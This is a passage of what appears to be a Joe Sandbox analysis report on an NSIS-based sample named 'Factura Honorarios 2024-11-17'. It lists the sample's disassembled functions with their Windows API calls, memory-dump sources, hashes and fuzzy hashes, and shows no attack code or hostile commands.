                                                                                                                                    • Part of subcall function 6FF4122C: lstrcpynW.KERNEL32(00000000,?,6FF412DF,00000019,6FF411BE,-000000A0), ref: 6FF4123C
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040), ref: 6FF42460
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FF4247B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4216380887-0
                                                                                                                                  • Opcode ID: 349f1ec913a9c01b7fb69554453e7e2435450c3bb0383cebc47d5aee0d0dafea
                                                                                                                                  • Instruction ID: 4929bf56a46e9b3b1171e5833d5907a35fba38058f9a6bb647dca1546736d29a
                                                                                                                                  • Opcode Fuzzy Hash: 349f1ec913a9c01b7fb69554453e7e2435450c3bb0383cebc47d5aee0d0dafea
                                                                                                                                  • Instruction Fuzzy Hash: 3441E1B1018304EFD710DF68D880A267FB8FF55324F004A6EE446D76A3DB32A598CB61
                                                                                                                                  Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                                                  • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                  Function 6FF41621 Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41639
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41640
                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FF421F0,?,00000808), ref: 6FF41654
                                                                                                                                  • GetProcAddress.KERNEL32(6FF421F0,00000000), ref: 6FF4165B
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6FF41664
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1913284405.000000006FF41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FF40000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1913259561.000000006FF40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913297381.000000006FF43000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1913309870.000000006FF45000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6ff40000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1148316912-0
                                                                                                                                  • Opcode ID: 9597c19324c2209fb4d76b6dc68868eb205bb3297a05ee0d7a14155a444f2c14
                                                                                                                                  • Instruction ID: 9d5ba8759c0f2fd736648b3e1a0434310c3fd660a4f225c8e4c9d191fed679e9
                                                                                                                                  • Opcode Fuzzy Hash: 9597c19324c2209fb4d76b6dc68868eb205bb3297a05ee0d7a14155a444f2c14
                                                                                                                                  • Instruction Fuzzy Hash: 8FF012721165387BDA2026AA8C4DD9BBE9CDF9B2F9B110311F618912A185624C15D7F1
                                                                                                                                  Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
                                                                                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                                  • Opcode Fuzzy Hash: c67b0ddec5e66c67a0e6e1e56ee4085375d163049c04c7743caf2b99499fe694
                                                                                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                                  Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                                  Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseValuelstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp
                                                                                                                                  • API String ID: 2655323295-2806350230
                                                                                                                                  • Opcode ID: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
                                                                                                                                  • Instruction ID: a134a75014e9aaf936f4ed277425746fec7608ee04f1c2dd62efd2514dae3daa
                                                                                                                                  • Opcode Fuzzy Hash: 847708cbd3b514d62a1299f522a031eeba4315d363bde44c88245d98e5e0fde9
                                                                                                                                  • Instruction Fuzzy Hash: 15118471D00104BEEB10AFA5DE89EAEBA74EB44754F11803BF504B71D1D7B88D419B68
                                                                                                                                  Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                                                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                                                                                  • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                  • API String ID: 2659869361-4083868402
                                                                                                                                  • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                  • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                                                                                  • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                                  • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                                                                                  Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Enum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                  • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                                                  • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                                                                  Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                                                                                  • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                                                                                  • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                                                                                  Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 0040528F
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                                                                                    • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                                                                                  • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                                                                                  • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                                                                                  Function 00406152 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll), ref: 004061A3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1871642625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1871626525.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871665427.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871685325.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1871819266.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                  • String ID: Call
                                                                                                                                  • API String ID: 3356406503-1824292864
                                                                                                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
